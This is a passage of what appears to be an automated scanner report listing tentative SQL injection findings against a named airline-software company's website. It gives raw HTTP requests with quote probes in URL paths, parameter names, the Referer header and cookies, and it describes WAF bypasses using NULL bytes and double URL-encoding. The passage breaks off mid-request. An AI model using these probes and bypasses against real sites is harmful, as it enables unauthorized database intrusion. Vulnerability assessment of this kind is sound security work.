Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322892; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Ffrequent_flyer_management%2F%22%3Bi%3A1%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_profit_essentials%2F%22%3Bi%3A2%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3Bi%3A3%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3B%7D;

Response 1

HTTP/1.1 404 Not Found
Date: Wed, 06 Oct 2010 03:21:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home%2527%2527/products_services/product/technical_records_hub HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322892; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Ffrequent_flyer_management%2F%22%3Bi%3A1%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_profit_essentials%2F%22%3Bi%3A2%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3Bi%3A3%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3B%7D;

Response 2

HTTP/1.1 302 Found
Date: Wed, 06 Oct 2010 03:21:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322892; expires=Thu, 06-Oct-2011 03:21:41 GMT; path=/
Set-Cookie: exp_last_activity=1286353300; expires=Thu, 06-Oct-2011 03:21:41 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Ffrequent_flyer_management%2F%22%3Bi%3A2%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_profit_essentials%2F%22%3Bi%3A3%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3Bi%3A4%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3B%7D; path=/
Location: http://www.sabreairlinesolutions.com/home/about/page-not-found/
Content-Length: 0
Connection: close
Content-Type: text/html


2.19. http://www.sabreairlinesolutions.com/home/products_services/product/technical_records_hub/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/product/technical_records_hub/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /home/products_services'/product/technical_records_hub/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322173; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A1%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fenterprise_operations%2Fairport%2F%22%3Bi%3A4%3Bs%3A45%3A%22%2Fproducts_services%2Fproduct%2Fsabre_emd_manager%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:24:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services''/product/technical_records_hub/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322173; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A1%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fenterprise_operations%2Fairport%2F%22%3Bi%3A4%3Bs%3A45%3A%22%2Fproducts_services%2Fproduct%2Fsabre_emd_manager%2F%22%3B%7D;

Response 2

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:24:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322173; expires=Thu, 06-Oct-2011 02:24:48 GMT; path=/
Set-Cookie: exp_last_activity=1286349888; expires=Thu, 06-Oct-2011 02:24:48 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 02:24:51 GMT
Pragma: no-cache
Content-Length: 3983
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...

2.20. http://www.sabreairlinesolutions.com/home/products_services/sabre_airvision_fleet_manager [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/sabre_airvision_fleet_manager

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /home/products_services/sabre_airvision_fleet_manager?1%00'=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_fleet_manager/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322569; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 04:19:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services/sabre_airvision_fleet_manager?1%00''=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_fleet_manager/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322569; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;

Response 2

HTTP/1.1 302 Found
Date: Wed, 06 Oct 2010 04:19:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322569; expires=Thu, 06-Oct-2011 04:19:22 GMT; path=/
Set-Cookie: exp_last_activity=1286356761; expires=Thu, 06-Oct-2011 04:19:22 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_airvision_fleet_manager%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D; path=/
Location: http://www.sabreairlinesolutions.com/home/page-not-found/
Content-Length: 0
Connection: close
Content-Type: text/html


2.21. http://www.sabreairlinesolutions.com/home/products_services/sabre_airvision_in-flight [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/sabre_airvision_in-flight

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /home%2527/products_services/sabre_airvision_in-flight HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_in-flight/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322568; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;

Response 1

HTTP/1.1 404 Not Found
Date: Wed, 06 Oct 2010 04:17:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home%2527%2527/products_services/sabre_airvision_in-flight HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_in-flight/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322568; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;

Response 2

HTTP/1.1 302 Found
Date: Wed, 06 Oct 2010 04:17:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322568; expires=Thu, 06-Oct-2011 04:17:53 GMT; path=/
Set-Cookie: exp_last_activity=1286356673; expires=Thu, 06-Oct-2011 04:17:53 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D; path=/
Location: http://www.sabreairlinesolutions.com/home/about/page-not-found/
Content-Length: 0
Connection: close
Content-Type: text/html


2.22. http://www.sabreairlinesolutions.com/home/products_services/sabre_airvision_in-flight [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/sabre_airvision_in-flight

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /home/products_services/sabre_airvision_in-flight HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322568; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 04:17:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services/sabre_airvision_in-flight HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322568; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;

Response 2

HTTP/1.1 302 Found
Date: Wed, 06 Oct 2010 04:17:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322568; expires=Thu, 06-Oct-2011 04:17:32 GMT; path=/
Set-Cookie: exp_last_activity=1286356652; expires=Thu, 06-Oct-2011 04:17:32 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A45%3A%22%2Fproducts_services%2Fsabre_airvision_in-flight%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D; path=/
Location: http://www.sabreairlinesolutions.com/home/page-not-found/
Content-Length: 0
Connection: close
Content-Type: text/html


2.23. http://www.sabreairlinesolutions.com/home/products_services/sabre_airvision_in-flight [__utma cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/sabre_airvision_in-flight

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /home/products_services/sabre_airvision_in-flight HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_in-flight/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1'; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322568; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 04:09:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services/sabre_airvision_in-flight HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_in-flight/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1''; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322568; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;

Response 2

HTTP/1.1 302 Found
Date: Wed, 06 Oct 2010 04:09:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322568; expires=Thu, 06-Oct-2011 04:09:21 GMT; path=/
Set-Cookie: exp_last_activity=1286356159; expires=Thu, 06-Oct-2011 04:09:21 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A45%3A%22%2Fproducts_services%2Fsabre_airvision_in-flight%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D; path=/
Location: http://www.sabreairlinesolutions.com/home/page-not-found/
Content-Length: 0
Connection: close
Content-Type: text/html


2.24. http://www.sabreairlinesolutions.com/home/products_services/sabre_airvision_network_manager [exp_last_activity cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/sabre_airvision_network_manager

Issue detail

The exp_last_activity cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the exp_last_activity cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /home/products_services/sabre_airvision_network_manager HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_network_manager/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322572%00'; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fincludes%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 04:18:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services/sabre_airvision_network_manager HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_network_manager/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322572%00''; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fincludes%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;

Response 2

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 04:18:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide
...[SNIP]...

2.25. http://www.sabreairlinesolutions.com/home/products_services/sabre_community_portal [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/sabre_community_portal

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /home/products_services/sabre_community_portal%2527 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
